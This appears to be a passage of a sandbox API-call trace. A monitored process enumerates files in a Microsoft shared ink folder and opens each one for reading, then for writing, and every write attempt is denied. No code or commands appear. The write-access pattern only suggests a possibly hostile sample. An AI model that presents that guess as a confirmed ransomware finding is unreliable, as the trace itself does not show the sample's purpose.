(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.290] AreFileApisANSI () returned 1 [0084.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0084.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82958 [0084.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x82958, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 68 [0084.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.290] GetLastError () returned 0x5 [0084.290] GetLastError () returned 0x5 [0084.290] SetLastError (dwErrCode=0x5) [0084.290] GetLastError () returned 0x5 [0084.290] SetLastError (dwErrCode=0x5) [0084.290] GetLastError () returned 0x5 [0084.290] SetLastError (dwErrCode=0x5) [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82958 | out: hHeap=0x20000) returned 1 [0084.291] AreFileApisANSI () returned 1 [0084.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0084.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0084.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 68 [0084.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.291] GetLastError () returned 0x5 [0084.291] GetLastError () returned 0x5 [0084.291] SetLastError (dwErrCode=0x5) [0084.291] GetLastError () returned 0x5 [0084.291] SetLastError (dwErrCode=0x5) [0084.291] GetLastError () returned 0x5 [0084.291] SetLastError (dwErrCode=0x5) [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0084.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0084.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0084.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0084.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0084.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0084.291] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0084.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0084.292] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78450 [0084.292] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6eba2ec1, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.293] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6eba2ec1, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0084.293] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0084.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0084.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0084.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0084.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0084.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0084.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.294] AreFileApisANSI () returned 1 [0084.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat", lpUsedDefaultChar=0x0) returned 64 [0084.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.294] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.294] AreFileApisANSI () returned 1 [0084.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0084.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0084.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 64 [0084.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0084.295] GetFileType (hFile=0x334) returned 0x1 [0084.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.295] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.295] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.295] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.295] CloseHandle (hObject=0x334) returned 1 [0084.295] AreFileApisANSI () returned 1 [0084.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0084.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0084.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 64 [0084.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.296] GetLastError () returned 0x5 [0084.296] GetLastError () returned 0x5 [0084.296] SetLastError (dwErrCode=0x5) [0084.296] GetLastError () returned 0x5 [0084.296] SetLastError (dwErrCode=0x5) [0084.296] GetLastError () returned 0x5 [0084.296] SetLastError (dwErrCode=0x5) [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.296] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe38781cd, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe38781cd, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x10cb30, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0084.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0084.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0084.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0084.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0084.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0084.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.297] AreFileApisANSI () returned 1 [0084.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat", lpUsedDefaultChar=0x0) returned 66 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0084.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.297] AreFileApisANSI () returned 1 [0084.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0084.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82568 [0084.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 66 [0084.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0084.298] GetFileType (hFile=0x334) returned 0x1 [0084.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0084.298] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.298] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.298] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.298] CloseHandle (hObject=0x334) returned 1 [0084.298] AreFileApisANSI () returned 1 [0084.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0084.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x829e8 [0084.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x829e8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 66 [0084.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.299] GetLastError () returned 0x5 [0084.299] GetLastError () returned 0x5 [0084.299] SetLastError (dwErrCode=0x5) [0084.299] GetLastError () returned 0x5 [0084.299] SetLastError (dwErrCode=0x5) [0084.299] GetLastError () returned 0x5 [0084.299] SetLastError (dwErrCode=0x5) [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x829e8 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0084.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.299] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cc99ae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb28b2edf, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb28b2edf, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2662f0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 